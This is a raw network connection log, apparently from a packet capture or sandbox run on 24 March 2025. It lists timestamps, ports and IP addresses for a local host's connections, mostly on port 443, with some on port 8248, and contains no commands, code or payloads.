Mar 24, 2025 10:13:02.241488934 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.241502047 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.241543055 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.241785049 CET	49737	443	192.168.2.4	151.101.66.137
Mar 24, 2025 10:13:02.241801023 CET	443	49737	151.101.66.137	192.168.2.4
Mar 24, 2025 10:13:02.345794916 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.355022907 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.377784967 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.396527052 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.396564960 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.396723986 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.396750927 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.396761894 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.396811962 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.397021055 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.397036076 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.397111893 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.397129059 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.442204952 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.444106102 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.444119930 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.444154978 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.444183111 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.445230961 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.450710058 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.475763083 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.475824118 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.478106976 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.478121996 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.478172064 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.478190899 CET	49710	443	192.168.2.4	204.79.197.222
Mar 24, 2025 10:13:02.542751074 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:13:02.699368000 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.699464083 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.701114893 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.701127052 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.701405048 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.701750994 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.705687046 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.705764055 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.707608938 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.707617998 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.708100080 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.708318949 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.748326063 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.756333113 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.799331903 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.799401045 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.799429893 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.799455881 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.799479008 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.799632072 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.803682089 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.803785086 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.803828955 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.804465055 CET	49740	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.804487944 CET	443	49740	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.805712938 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.805811882 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.805857897 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.805866003 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.805885077 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.805980921 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.809170961 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.812057018 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.812115908 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.812129974 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.816421986 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.816498041 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.816510916 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.819036961 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.819082975 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.819091082 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.822482109 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.822547913 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.822555065 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.826528072 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.826601028 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.826616049 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.832560062 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.832618952 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.832623959 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.832638979 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.832674026 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.835736036 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.840739965 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.840783119 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.840796947 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.840809107 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.840861082 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.842653990 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.847490072 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.847672939 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.847682953 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.889882088 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.889893055 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.904480934 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.904535055 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.904555082 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.906824112 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.906882048 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.906891108 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.911789894 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.911839008 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.911847115 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.914835930 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.914889097 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.914899111 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.916789055 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.916848898 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.916857958 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.917037964 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.917175055 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.921550035 CET	49739	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.921555042 CET	443	49739	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.929541111 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.929555893 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.929635048 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.929745913 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.929759026 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.931149006 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.931186914 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:02.931268930 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.931385040 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:02.931397915 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.125718117 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.125787020 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.126379967 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.126605988 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.127777100 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.127790928 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.128104925 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.128113031 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.128393888 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.128599882 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.128705978 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.128813982 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.172337055 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.172354937 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.314829111 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315326929 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315419912 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315419912 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315479040 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.315489054 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315521955 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315538883 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.315570116 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315612078 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315613031 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315645933 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.315649033 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315668106 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.315670967 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315681934 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315685034 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.315745115 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.315793991 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.317025900 CET	49744	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.317039967 CET	443	49744	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.317593098 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.317651033 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.317658901 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.320759058 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.320808887 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.320817947 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.324450970 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.324506044 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.324520111 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.327510118 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.327641010 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.327647924 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.334023952 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.334079027 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.334084988 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.337640047 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.337713957 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.337743044 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.337750912 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.337783098 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.342058897 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.343106985 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.343159914 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.343167067 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.346779108 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.346836090 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.346843004 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.392441034 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.392448902 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.410615921 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.410684109 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.410692930 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.411174059 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.411230087 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.411237955 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.414175034 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.414340019 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.414346933 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.418999910 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.419059992 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.419066906 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.421526909 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.421591043 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.421597958 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.421753883 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:03.421808958 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.422002077 CET	49743	443	192.168.2.4	199.232.192.193
Mar 24, 2025 10:13:03.422015905 CET	443	49743	199.232.192.193	192.168.2.4
Mar 24, 2025 10:13:05.168797970 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:13:05.648319006 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:13:05.648396969 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:13:05.648637056 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:13:05.812516928 CET	49730	443	192.168.2.4	142.251.35.164
Mar 24, 2025 10:13:05.812551975 CET	443	49730	142.251.35.164	192.168.2.4
Mar 24, 2025 10:13:06.943252087 CET	49671	443	192.168.2.4	204.79.197.203
Mar 24, 2025 10:13:14.782912016 CET	49678	443	192.168.2.4	20.189.173.27
Mar 24, 2025 10:13:20.652930975 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:20.808865070 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:20.808979034 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:20.809415102 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:20.967730999 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:20.967771053 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:20.967828035 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:20.971148014 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:20.971791983 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:21.127592087 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:21.127909899 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:21.128036976 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:21.254091978 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.254134893 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.254200935 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.254829884 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.254844904 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.470304012 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.470434904 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.484220028 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.484241009 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.484544992 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.488629103 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.536381960 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.723412991 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.723577023 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.723637104 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.726362944 CET	49751	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:21.726376057 CET	443	49751	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:21.728337049 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:21.836607933 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:21.836658955 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:21.836728096 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:21.837112904 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:21.837138891 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:21.925916910 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:22.051630974 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.051703930 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:22.052350998 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:22.052377939 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.052632093 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.053076029 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:22.096366882 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.307032108 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.307096004 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:22.307142973 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:22.308577061 CET	49752	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:22.308595896 CET	443	49752	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:28.948201895 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.103533030 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:29.103609085 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.103904963 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.259129047 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:29.259444952 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.259704113 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.316956043 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.316999912 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.317116976 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.317282915 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.317290068 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.414901018 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:29.414916992 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:29.418937922 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.418963909 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.419178009 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.419326067 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.419337988 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.467137098 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.631076097 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.631365061 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.631386042 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.631550074 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.631556988 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.804157972 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.804259062 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.806066036 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.806076050 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.806329012 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.806786060 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:29.852327108 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:29.884551048 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.884716034 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.884797096 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.893574953 CET	49755	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:13:29.893601894 CET	443	49755	104.26.12.205	192.168.2.4
Mar 24, 2025 10:13:29.896034002 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:13:29.900296926 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:29.900347948 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:29.900427103 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:29.900597095 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:29.900608063 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.091109991 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:13:30.115099907 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.115417004 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:30.115453005 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.115605116 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:30.115611076 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.367415905 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.367578030 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:30.367729902 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:30.379199028 CET	49756	443	192.168.2.4	172.67.74.152
Mar 24, 2025 10:13:30.379210949 CET	443	49756	172.67.74.152	192.168.2.4
Mar 24, 2025 10:13:36.281838894 CET	80	49717	43.152.183.74	192.168.2.4
Mar 24, 2025 10:13:36.282043934 CET	49717	80	192.168.2.4	43.152.183.74
Mar 24, 2025 10:13:36.282080889 CET	49717	80	192.168.2.4	43.152.183.74
Mar 24, 2025 10:13:36.292453051 CET	49715	80	192.168.2.4	142.250.80.67
Mar 24, 2025 10:13:36.382304907 CET	80	49717	43.152.183.74	192.168.2.4
Mar 24, 2025 10:13:36.386850119 CET	80	49715	142.250.80.67	192.168.2.4
Mar 24, 2025 10:13:36.386986017 CET	49715	80	192.168.2.4	142.250.80.67
Mar 24, 2025 10:13:37.354680061 CET	49718	443	192.168.2.4	23.33.40.147
Mar 24, 2025 10:13:42.120124102 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.120202065 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.120282888 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.121436119 CET	49754	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.121462107 CET	443	49754	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.449927092 CET	49758	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.449965000 CET	443	49758	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.450047016 CET	49758	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.450234890 CET	49758	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.450252056 CET	443	49758	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.757750988 CET	443	49758	104.168.138.190	192.168.2.4
Mar 24, 2025 10:13:42.757849932 CET	49758	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.758646965 CET	49758	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:13:42.758661032 CET	443	49758	104.168.138.190	192.168.2.4
